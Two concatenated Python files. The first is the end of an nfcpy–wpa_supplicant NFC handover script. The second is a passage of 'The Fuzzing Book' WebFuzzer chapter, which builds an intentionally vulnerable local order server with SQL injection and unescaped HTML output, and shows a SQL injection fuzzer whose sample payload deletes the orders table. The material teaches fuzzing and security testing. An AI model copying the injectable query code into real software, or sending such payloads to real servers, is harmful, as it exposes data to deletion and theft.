summary("not a handover request")
else:
try:
request = nfc.ndef.HandoverRequestMessage(request)
except nfc.ndef.DecodeError as e:
summary("error decoding 'Hr' message: {}".format(e))
else:
response = self.process_request(request)
summary("send handover response {}".format(response.type))
return response
def process_request(self, request):
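# Build the handover select answer: prefer a P2P carrier record if the
# request contains one, otherwise fall back to a WSC carrier, and report
# the completed exchange to wpa_supplicant in either case.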
self.ho_server_processing = True
clear_raw_mode()
print "HandoverServer - request received"
try:
print "Parsed handover request: " + request.pretty()
except Exception, e:
print e
sel = nfc.ndef.HandoverSelectMessage(version="1.2")
found = False
for carrier in request.carriers:
print "Remote carrier type: " + carrier.type
if carrier.type == "application/vnd.wfa.p2p":
print "P2P carrier type match - add P2P carrier record"
found = True
self.received_carrier = carrier.record
print "Carrier record:"
try:
print carrier.record.pretty()
except Exception, e:
print e
data = wpas_get_handover_sel()
if data is None:
print "Could not get handover select carrier record from wpa_supplicant"
continue
print "Handover select carrier record from wpa_supplicant:"
print data.encode("hex")
self.sent_carrier = data
if "OK" in wpas_report_handover(self.received_carrier, self.sent_carrier, "RESP"):
success_report("P2P handover reported successfully (responder)")
else:
summary("P2P handover report rejected")
break
message = nfc.ndef.Message(data)
sel.add_carrier(message[0], "active", message[1:])
break
for carrier in request.carriers:
if found:
break
print "Remote carrier type: " + carrier.type
if carrier.type == "application/vnd.wfa.wsc":
print "WSC carrier type match - add WSC carrier record"
found = True
self.received_carrier = carrier.record
print "Carrier record:"
try:
print carrier.record.pretty()
except Exception, e:
print e
data = wpas_get_handover_sel_wps()
if data is None:
print "Could not get handover select carrier record from wpa_supplicant"
continue
print "Handover select carrier record from wpa_supplicant:"
print data.encode("hex")
self.sent_carrier = data
if "OK" in wpas_report_handover_wsc(self.received_carrier, self.sent_carrier, "RESP"):
success_report("WSC handover reported successfully")
else:
summary("WSC handover report rejected")
break
message = nfc.ndef.Message(data)
sel.add_carrier(message[0], "active", message[1:])
found = True
break
print "Handover select:"
try:
print sel.pretty()
except Exception, e:
print e
print str(sel).encode("hex")
summary("Sending handover select")
self.success = True
return sel
def clear_raw_mode():
import sys, tty, termios
global prev_tcgetattr, in_raw_mode
if not in_raw_mode:
return
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
def getch():
import sys, tty, termios, select
global prev_tcgetattr, in_raw_mode
fd = sys.stdin.fileno()
prev_tcgetattr = termios.tcgetattr(fd)
ch = None
try:
tty.setraw(fd)
in_raw_mode = True
[i, o, e] = select.select([fd], [], [], 0.05)
if i:
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
return ch
def p2p_tag_read(tag):
success = False
if len(tag.ndef.message):
for record in tag.ndef.message:
print "record type " + record.type
if record.type == "application/vnd.wfa.wsc":
summary("WPS tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
if record.type == "application/vnd.wfa.p2p":
summary("P2P tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
else:
summary("Empty tag")
if success:
success_report("Tag read succeeded")
return success
def rdwr_connected_p2p_write(tag):
summary("Tag found - writing - " + str(tag))
global p2p_sel_data
tag.ndef.message = str(p2p_sel_data)
success_report("Tag write succeeded")
print "Done - remove tag"
global only_one
if only_one:
global continue_loop
continue_loop = False
global p2p_sel_wait_remove
return p2p_sel_wait_remove
def wps_write_p2p_handover_sel(clf, wait_remove=True):
print "Write P2P handover select"
data = wpas_get_handover_sel(tag=True)
if (data == None):
summary("Could not get P2P handover select from wpa_supplicant")
return
global p2p_sel_wait_remove
p2p_sel_wait_remove = wait_remove
global p2p_sel_data
p2p_sel_data = nfc.ndef.HandoverSelectMessage(version="1.2")
message = nfc.ndef.Message(data)
p2p_sel_data.add_carrier(message[0], "active", message[1:])
print "Handover select:"
try:
print p2p_sel_data.pretty()
except Exception, e:
print e
print str(p2p_sel_data).encode("hex")
print "Touch an NFC tag"
clf.connect(rdwr={'on-connect': rdwr_connected_p2p_write})
def rdwr_connected(tag):
global only_one, no_wait
summary("Tag connected: " + str(tag))
if tag.ndef:
print "NDEF tag: " + tag.type
try:
print tag.ndef.message.pretty()
except Exception, e:
print e
success = p2p_tag_read(tag)
if only_one and success:
global continue_loop
continue_loop = False
else:
summary("Not an NDEF tag - remove tag")
return True
return not no_wait
def llcp_worker(llc):
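# Background worker for an established LLCP link: either start the handover
# client immediately (init_on_touch) or wait for the peer, optionally letting
# the user choose via keyboard ('i' = WPS+P2P, 'p' = P2P only, 'w' = WPS only)
# which carriers to include in the request.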
global init_on_touch
if init_on_touch:
print "Starting handover client"
p2p_handover_client(llc)
return
global no_input
if no_input:
print "Wait for handover to complete"
else:
print "Wait for handover to complete - press 'i' to initiate ('w' for WPS only, 'p' for P2P only)"
global srv
global wait_connection
while not wait_connection and srv.sent_carrier is None:
if srv.ho_server_processing:
time.sleep(0.025)
elif no_input:
time.sleep(0.5)
else:
global include_wps_req, include_p2p_req
res = getch()
if res == 'i':
include_wps_req = True
include_p2p_req = True
elif res == 'p':
include_wps_req = False
include_p2p_req = True
elif res == 'w':
include_wps_req = True
include_p2p_req = False
else:
continue
clear_raw_mode()
print "Starting handover client"
p2p_handover_client(llc)
return
clear_raw_mode()
print "Exiting llcp_worker thread"
def llcp_startup(clf, llc):
print "Start LLCP server"
global srv
srv = HandoverServer(llc)
return llc
def llcp_connected(llc):
print "P2P LLCP connected"
global wait_connection
wait_connection = False
global init_on_touch
if not init_on_touch:
global srv
srv.start()
if init_on_touch or not no_input:
threading.Thread(target=llcp_worker, args=(llc,)).start()
return True
def terminate_loop():
global terminate_now
return terminate_now
def main():
clf = nfc.ContactlessFrontend()
parser = argparse.ArgumentParser(description='nfcpy to wpa_supplicant integration for P2P and WPS NFC operations')
parser.add_argument('-d', const=logging.DEBUG, default=logging.INFO,
action='store_const', dest='loglevel',
help='verbose debug output')
parser.add_argument('-q', const=logging.WARNING, action='store_const',
dest='loglevel', help='be quiet')
parser.add_argument('--only-one', '-1', action='store_true',
help='run only one operation and exit')
parser.add_argument('--init-on-touch', '-I', action='store_true',
help='initiate handover on touch')
parser.add_argument('--no-wait', action='store_true',
help='do not wait for tag to be removed before exiting')
parser.add_argument('--ifname', '-i',
help='network interface name')
parser.add_argument('--no-wps-req', '-N', action='store_true',
help='do not include WPS carrier record in request')
parser.add_argument('--no-input', '-a', action='store_true',
help='do not use stdout input to initiate handover')
parser.add_argument('--tag-read-only', '-t', action='store_true',
help='tag read only (do not allow connection handover)')
parser.add_argument('--handover-only', action='store_true',
help='connection handover only (do not allow tag read)')
parser.add_argument('--freq', '-f',
help='forced frequency of operating channel in MHz')
parser.add_argument('--summary',
help='summary file for writing status updates')
parser.add_argument('--success',
help='success file for writing success update')
parser.add_argument('command', choices=['write-p2p-sel'],
nargs='?')
args = parser.parse_args()
global only_one
only_one = args.only_one
global no_wait
no_wait = args.no_wait
global force_freq
force_freq = args.freq
logging.basicConfig(level=args.loglevel)
global init_on_touch
init_on_touch = args.init_on_touch
if args.ifname:
global ifname
ifname = args.ifname
print "Selected ifname " + ifname
if args.no_wps_req:
global include_wps_req
include_wps_req = False
if args.summary:
global summary_file
summary_file = args.summary
if args.success:
global success_file
success_file = args.success
if args.no_input:
global no_input
no_input = True
clf = nfc.ContactlessFrontend()
global wait_connection
try:
if not clf.open("usb"):
print "Could not open connection with an NFC device"
raise SystemExit
if args.command == "write-p2p-sel":
wps_write_p2p_handover_sel(clf, wait_remove=not args.no_wait)
raise SystemExit
global continue_loop
while continue_loop:
print "Waiting for a tag or peer to be touched"
wait_connection = True
try:
if args.tag_read_only:
if not clf.connect(rdwr={'on-connect': rdwr_connected}):
break
elif args.handover_only:
if not clf.connect(llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
else:
if not clf.connect(rdwr={'on-connect': rdwr_connected},
llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
except Exception, e:
print "clf.connect failed"
global srv
if only_one and srv and srv.success:
raise SystemExit
except KeyboardInterrupt:
raise SystemExit
finally:
clf.close()
raise SystemExit
if __name__ == '__main__':
main()
|
WebFuzzer.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Testing Web Applications" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/WebFuzzer.html
# Last change: 2021-10-16 12:21:54+02:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Testing Web Applications
This file can be _executed_ as a script, running all experiments:
$ python WebFuzzer.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.WebFuzzer import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/WebFuzzer.html
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
>>> web_form_fuzzer = WebFormFuzzer(httpd_url)
>>> web_form_fuzzer.grammar['<start>']
['<action>?<query>']
>>> web_form_fuzzer.grammar['<action>']
['/order']
>>> web_form_fuzzer.grammar['<query>']
['<item>&<name>&<email>&<city>&<zip>&<terms>&<submit>']
Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
>>> web_form_fuzzer.fuzz()
'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
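For instance, the fuzzed paths can be handed to the `WebRunner` helper defined later in this module to actually submit a few orders (a minimal sketch, assuming the demo server is still running at `httpd_url`):
>>> web_runner = WebRunner(httpd_url)
>>> web_form_fuzzer.runs(web_runner, 5)  # five fuzzed submissions, each yielding (url, outcome)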
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
>>> sql_fuzzer.fuzz()
"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit="
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.
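The same `WebRunner` helper can be used to actually send such a fuzzed path to the server (again a sketch, assuming the demo server at `httpd_url` is reachable):
>>> sql_fuzzer.run(web_runner)  # one injection attempt, returning (url, outcome)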
For more details, source, and documentation, see
"The Fuzzing Book - Testing Web Applications"
at https://www.fuzzingbook.org/html/WebFuzzer.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Testing Web Applications
# ========================
if __name__ == '__main__':
print('# Testing Web Applications')
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## A Web User Interface
## --------------------
if __name__ == '__main__':
print('\n## A Web User Interface')
from http.server import HTTPServer, BaseHTTPRequestHandler, HTTPStatus
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
pass
### Taking Orders
if __name__ == '__main__':
print('\n### Taking Orders')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
FUZZINGBOOK_SWAG = {
"tshirt": "One FuzzingBook T-Shirt",
"drill": "One FuzzingBook Rotary Hammer",
"lockset": "One FuzzingBook Lock Set"
}
HTML_ORDER_FORM = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
<p>
Yes! Please send me at your earliest convenience
<select name="item">
"""
# (We don't use h2, h3, etc. here as they interfere with the notebook table of contents)
for item in FUZZINGBOOK_SWAG:
HTML_ORDER_FORM += \
'<option value="{item}">{name}</option>\n'.format(item=item,
name=FUZZINGBOOK_SWAG[item])
HTML_ORDER_FORM += """
</select>
<br>
<table>
<tr><td>
<label for="name">Name: </label><input type="text" name="name">
</td><td>
<label for="email">Email: </label><input type="email" name="email"><br>
</td></tr>
<tr><td>
<label for="city">City: </label><input type="text" name="city">
</td><td>
<label for="zip">ZIP Code: </label><input type="number" name="zip">
</td></tr>
</table>
<input type="checkbox" name="terms"><label for="terms">I have read
the <a href="/terms">terms and conditions</a></label>.<br>
<input type="submit" name="submit" value="Place order">
</p>
</form>
</body></html>
"""
if __name__ == '__main__':
from IPython.display import display
from .bookutils import HTML
if __name__ == '__main__':
HTML(HTML_ORDER_FORM)
### Order Confirmation
if __name__ == '__main__':
print('\n### Order Confirmation')
HTML_ORDER_RECEIVED = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
<p id="confirmation">
We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
A confirmation mail will be sent to {email}.
</p>
<p>
Want more swag? Use our <a href="/">order form</a>!
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer",
name="Jane Doe",
email="doe@example.com",
city="Seattle",
zip="98104"))
### Terms and Conditions
if __name__ == '__main__':
print('\n### Terms and Conditions')
HTML_TERMS_AND_CONDITIONS = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong>
<p>
The content of this project is licensed under the
<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License.</a>
</p>
<p>
To place an order, use our <a href="/">order form</a>.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_TERMS_AND_CONDITIONS)
## Storing Orders
## --------------
if __name__ == '__main__':
print('\n## Storing Orders')
import sqlite3
import os
ORDERS_DB = "orders.db"
def init_db():
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
db_connection = sqlite3.connect(ORDERS_DB)
db_connection.execute("DROP TABLE IF EXISTS orders")
db_connection.execute("CREATE TABLE orders (item text, name text, email text, city text, zip text)")
db_connection.commit()
return db_connection
if __name__ == '__main__':
db = init_db()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("INSERT INTO orders " +
"VALUES ('lockset', 'Walter White', 'white@jpwynne.edu', 'Albuquerque', '87101')")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders WHERE name = 'Walter White'")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Handling HTTP Requests
if __name__ == '__main__':
print('\n### Handling HTTP Requests')
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
# print("GET " + self.path)
if self.path == "/":
self.send_order_form()
elif self.path.startswith("/order"):
self.handle_order()
elif self.path.startswith("/terms"):
self.send_terms_and_conditions()
else:
self.not_found()
except Exception:
self.internal_server_error()
#### Order Form
if __name__ == '__main__':
print('\n#### Order Form')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_form(self):
self.send_response(HTTPStatus.OK, "Place your order")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_ORDER_FORM.encode("utf8"))
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_terms_and_conditions(self):
self.send_response(HTTPStatus.OK, "Terms and Conditions")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8"))
#### Processing Orders
if __name__ == '__main__':
print('\n#### Processing Orders')
import urllib.parse
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def get_field_values(self):
# Note: this fails to decode non-ASCII characters properly
query_string = urllib.parse.urlparse(self.path).query
# fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}
fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)
values = {}
for key in fields:
values[key] = fields[key][0]
return values
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def handle_order(self):
values = self.get_field_values()
self.store_order(values)
self.send_order_received(values)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
# The following should be one line
sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
self.log_message("%s", sql_command)
db.executescript(sql_command)
db.commit()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_received(self, values):
# Should use html.escape()
values["item_name"] = FUZZINGBOOK_SWAG[values["item"]]
confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
#### Other HTTP commands
if __name__ == '__main__':
print('\n#### Other HTTP commands')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_HEAD(self):
# print("HEAD " + self.path)
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "text/html")
self.end_headers()
### Error Handling
if __name__ == '__main__':
print('\n### Error Handling')
#### Page Not Found
if __name__ == '__main__':
print('\n#### Page Not Found')
HTML_NOT_FOUND = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Sorry.</strong>
<p>
This page does not exist. Try our <a href="/">order form</a> instead.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_NOT_FOUND)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def not_found(self):
self.send_response(HTTPStatus.NOT_FOUND, "Not found")
self.send_header("Content-type", "text/html")
self.end_headers()
message = HTML_NOT_FOUND
self.wfile.write(message.encode("utf8"))
#### Internal Errors
if __name__ == '__main__':
print('\n#### Internal Errors')
HTML_INTERNAL_SERVER_ERROR = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Internal Server Error</strong>
<p>
The server has encountered an internal error. Go to our <a href="/">order form</a>.
<pre>{error_message}</pre>
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_INTERNAL_SERVER_ERROR)
import sys
import traceback
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)
self.wfile.write(message.encode("utf8"))
### Logging
if __name__ == '__main__':
print('\n### Logging')
from multiprocess import Queue
HTTPD_MESSAGE_QUEUE = Queue()
HTTPD_MESSAGE_QUEUE.put("I am another message")
HTTPD_MESSAGE_QUEUE.put("I am one more message")
from .bookutils import rich_output, terminal_escape
def display_httpd_message(message):
if rich_output():
display(
HTML(
'<pre style="background: NavajoWhite;">' +
message +
"</pre>"))
else:
print(terminal_escape(message))
if __name__ == '__main__':
display_httpd_message("I am a httpd server message")
def print_httpd_messages():
while not HTTPD_MESSAGE_QUEUE.empty():
message = HTTPD_MESSAGE_QUEUE.get()
display_httpd_message(message)
import time
if __name__ == '__main__':
time.sleep(1)
print_httpd_messages()
def clear_httpd_messages():
while not HTTPD_MESSAGE_QUEUE.empty():
HTTPD_MESSAGE_QUEUE.get()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
message = ("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
HTTPD_MESSAGE_QUEUE.put(message)
if __name__ == '__main__':
import requests
def webbrowser(url, mute=False):
"""Download the http/https resource given by the URL"""
import requests # for imports
try:
r = requests.get(url)
contents = r.text
finally:
if not mute:
print_httpd_messages()
else:
clear_httpd_messages()
return contents
### Running the Server
if __name__ == '__main__':
print('\n### Running the Server')
def run_httpd_forever(handler_class):
host = "127.0.0.1" # localhost IP
for port in range(8800, 9000):
httpd_address = (host, port)
try:
httpd = HTTPServer(httpd_address, handler_class)
break
except OSError:
continue
httpd_url = "http://" + host + ":" + repr(port)
HTTPD_MESSAGE_QUEUE.put(httpd_url)
httpd.serve_forever()
from multiprocess import Process
def start_httpd(handler_class=SimpleHTTPRequestHandler):
clear_httpd_messages()
httpd_process = Process(target=run_httpd_forever, args=(handler_class,))
httpd_process.start()
httpd_url = HTTPD_MESSAGE_QUEUE.get()
return httpd_process, httpd_url
if __name__ == '__main__':
httpd_process, httpd_url = start_httpd()
httpd_url
### Interacting with the Server
if __name__ == '__main__':
print('\n### Interacting with the Server')
#### Direct Browser Access
if __name__ == '__main__':
print('\n#### Direct Browser Access')
def print_url(url):
if rich_output():
display(HTML('<pre><a href="%s">%s</a></pre>' % (url, url)))
else:
print(terminal_escape(url))
if __name__ == '__main__':
print_url(httpd_url)
if __name__ == '__main__':
from IPython.display import IFrame
if __name__ == '__main__':
IFrame(httpd_url, '100%', 230)
if __name__ == '__main__':
print_httpd_messages()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders")
db.commit()
#### Retrieving the Home Page
if __name__ == '__main__':
print('\n#### Retrieving the Home Page')
if __name__ == '__main__':
contents = webbrowser(httpd_url)
if __name__ == '__main__':
HTML(contents)
#### Placing Orders
if __name__ == '__main__':
print('\n#### Placing Orders')
from urllib.parse import urljoin, urlsplit
if __name__ == '__main__':
urljoin(httpd_url, "/order?foo=bar")
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
if __name__ == '__main__':
HTML(contents)
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
#### Error Messages
if __name__ == '__main__':
print('\n#### Error Messages')
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))
## Fuzzing Input Forms
## -------------------
if __name__ == '__main__':
print('\n## Fuzzing Input Forms')
### Fuzzing with Expected Values
if __name__ == '__main__':
print('\n### Fuzzing with Expected Values')
import string
def cgi_encode(s, do_not_encode=""):
ret = ""
for c in s:
if (c in string.ascii_letters or c in string.digits
or c in "$-_.+!*'()," or c in do_not_encode):
ret += c
elif c == ' ':
ret += '+'
else:
ret += "%%%02x" % ord(c)
return ret
if __name__ == '__main__':
s = cgi_encode('Is "DOW30" down .24%?')
s
if __name__ == '__main__':
cgi_encode("<string>@<string>", "<>")
from .Coverage import cgi_decode # minor dependency
if __name__ == '__main__':
cgi_decode(s)
from .Grammars import crange, is_valid_grammar, syntax_diagram
ORDER_GRAMMAR = {
"<start>": ["<order>"],
"<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
"<item>": ["tshirt", "drill", "lockset"],
"<name>": [cgi_encode("Jane Doe"), cgi_encode("John Smith")],
"<email>": [cgi_encode("j.doe@example.com"), cgi_encode("j_smith@example.com")],
"<city>": ["Seattle", cgi_encode("New York")],
"<zip>": ["<digit>" * 5],
"<digit>": crange('0', '9')
}
if __name__ == '__main__':
assert is_valid_grammar(ORDER_GRAMMAR)
if __name__ == '__main__':
syntax_diagram(ORDER_GRAMMAR)
from .GrammarFuzzer import GrammarFuzzer
if __name__ == '__main__':
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Fuzzing with Unexpected Values
if __name__ == '__main__':
print('\n### Fuzzing with Unexpected Values')
if __name__ == '__main__':
seed = order_fuzzer.fuzz()
seed
from .MutationFuzzer import MutationFuzzer # minor dependency
if __name__ == '__main__':
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
while True:
path = mutate_order_fuzzer.fuzz()
url = urljoin(httpd_url, path)
r = requests.get(url)
if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
break
if __name__ == '__main__':
url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(url))
if __name__ == '__main__':
failing_path = path
failing_path
from .Fuzzer import Runner
class WebRunner(Runner):
def __init__(self, base_url=None):
self.base_url = base_url
def run(self, url):
if self.base_url is not None:
url = urljoin(self.base_url, url)
import requests # for imports
r = requests.get(url)
if r.status_code == HTTPStatus.OK:
return url, Runner.PASS
elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
return url, Runner.FAIL
else:
return url, Runner.UNRESOLVED
if __name__ == '__main__':
web_runner = WebRunner(httpd_url)
web_runner.run(failing_path)
from .Reducer import DeltaDebuggingReducer # minor
if __name__ == '__main__':
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path
if __name__ == '__main__':
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(minimized_url))
## Extracting Grammars for Input Forms
## -----------------------------------
if __name__ == '__main__':
print('\n## Extracting Grammars for Input Forms')
### Searching HTML for Input Fields
if __name__ == '__main__':
print('\n### Searching HTML for Input Fields')
if __name__ == '__main__':
html_text = webbrowser(httpd_url)
print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")])
from html.parser import HTMLParser
class FormHTMLParser(HTMLParser):
def reset(self):
super().reset()
self.action = "" # Form action
# Map of field name to type (or selection name to [option_1, option_2,
# ...])
self.fields = {}
self.select = [] # Stack of currently active selection names
class FormHTMLParser(FormHTMLParser):
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
# print(tag, attributes)
if tag == "form":
self.action = attributes.get("action", "")
elif tag == "select" or tag == "datalist":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = []
self.select.append(name)
else:
self.select.append(None)
elif tag == "option" and "multiple" not in attributes:
current_select_name = self.select[-1]
if current_select_name is not None and "value" in attributes:
self.fields[current_select_name].append(attributes["value"])
elif tag == "input" or tag == "option" or tag == "textarea":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = attributes.get("type", "text")
elif tag == "button":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = [""]
class FormHTMLParser(FormHTMLParser):
def handle_endtag(self, tag):
if tag == "select":
self.select.pop()
class HTMLGrammarMiner(object):
def __init__(self, html_text):
html_parser = FormHTMLParser()
html_parser.feed(html_text)
self.fields = html_parser.fields
self.action = html_parser.action
if __name__ == '__main__':
html_miner = HTMLGrammarMiner(html_text)
html_miner.action
if __name__ == '__main__':
html_miner.fields
### Mining Grammars for Web Pages
if __name__ == '__main__':
print('\n### Mining Grammars for Web Pages')
from .Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar
class HTMLGrammarMiner(HTMLGrammarMiner):
QUERY_GRAMMAR = extend_grammar(CGI_GRAMMAR, {
"<start>": ["<action>?<query>"],
"<text>": ["<string>"],
"<number>": ["<digits>"],
"<digits>": ["<digit>", "<digits><digit>"],
"<digit>": crange('0', '9'),
"<checkbox>": ["<_checkbox>"],
"<_checkbox>": ["on", "off"],
"<email>": ["<_email>"],
"<_email>": [cgi_encode("<string>@<string>", "<>")],
# Use a fixed password in case we need to repeat it
"<password>": ["<_password>"],
"<_password>": ["abcABC.123"],
# Stick to printable characters to avoid logging problems
"<percent>": ["%<hexdigit-1><hexdigit>"],
"<hexdigit-1>": srange("34567"),
# Submissions:
"<submit>": [""]
})
class HTMLGrammarMiner(HTMLGrammarMiner):
def mine_grammar(self):
grammar = extend_grammar(self.QUERY_GRAMMAR)
grammar["<action>"] = [self.action]
query = ""
for field in self.fields:
field_symbol = new_symbol(grammar, "<" + field + ">")
field_type = self.fields[field]
if query != "":
query += "&"
query += field_symbol
if isinstance(field_type, str):
field_type_symbol = "<" + field_type + ">"
grammar[field_symbol] = [field + "=" + field_type_symbol]
if field_type_symbol not in grammar:
# Unknown type
grammar[field_type_symbol] = ["<text>"]
else:
# List of values
